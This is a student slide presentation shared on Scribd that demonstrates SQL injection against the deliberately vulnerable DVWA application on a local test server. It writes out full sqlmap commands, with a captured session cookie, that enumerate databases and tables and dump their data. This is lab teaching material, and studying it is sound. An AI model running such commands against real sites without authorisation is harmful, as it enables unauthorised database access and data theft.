Scribd
Upload
120 views

SQL Injection Attack Demonstration

This document demonstrates how to perform an SQL injection attack using the SQLmap tool. It shows the steps to identify vulnerable parameters in a URL, capture cookies for the site, and then use SQLmap commands to list databases, tables, and extract data from the tables by exploiting SQL injection vulnerabilities. The demonstration targets a vulnerable web application called DVWA running on a test server.

Uploaded by

Ronak Makwana
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
120 views

SQL Injection Attack Demonstration

This document demonstrates how to perform an SQL injection attack using the SQLmap tool. It shows the steps to identify vulnerable parameters in a URL, capture cookies for the site, and then use SQLmap commands to list databases, tables, and extract data from the tables by exploiting SQL injection vulnerabilities. The demonstration targets a vulnerable web application called DVWA running on a test server.

Uploaded by

Ronak Makwana
Copyright
© © All Rights Reserved
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 9

SQL Injection Attack

Demonstration

Presentation by:
(1)Ronak Makwana
(2)Yash Keral
Project Description

 The Project involves performing SQL injection on vulnerable systems using the SQLmap tool.
 SQL injection Attacks are designed to exploit Vulnerabilities in web applications that allow an attacker to
inject malicious SQL code into a query, potentially allowing unauthorized access to data.
 The project may involve using different techniques such as blind SQL Injection, error-based SQL injection
and other methods to exploit vulnerabilities.
SQL Injection on DVWA using SQLMap

 Step 1: to be able to run SQLMap tool, first we


must identify the parameter and the URL that we
want to test SQLi Injection for.
SQL Injection on DVWA using SQLMap (Cont.)

 Step 2: When we enter a keyword in the User ID


field you can notice the will be change because of
get request method.
 We will pass this URL as parameter for SQLMap.
SQL Injection on DVWA using SQLMap (Cont.)

 Step 3: Capture the cookie using Burpsuite which


will be also used as parameter for SQLMap
 Now, we are ready to execute attack
SQL Injection on DVWA using SQLMap (Cont.)

 We can list the databases through SQL injection


with following command : $sqlmap -u
"http://192.168.1.19/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie='security=low;
PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c
91' --dbs
SQL Injection on DVWA using SQLMap (Cont.)

 Now, for the listing down table we can use


following command: sqlmap -u
"http://192.168.1.19/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie='security=low;
PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c
91' -D dvwa -tables
SQL Injection on DVWA using SQLMap (Cont.)

 At the end, we can use following command for


extracting data from tables: sqlmap -u
"http://192.168.1.19/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie='security=low;
PHPSESSID=4bcf28d8cd3f4ad8a6560c0fd0567c
91' -dump dvwa
 So, this is how we can perfrom SQL Injection
Attack using SQLMap.
Thank You!

You might also like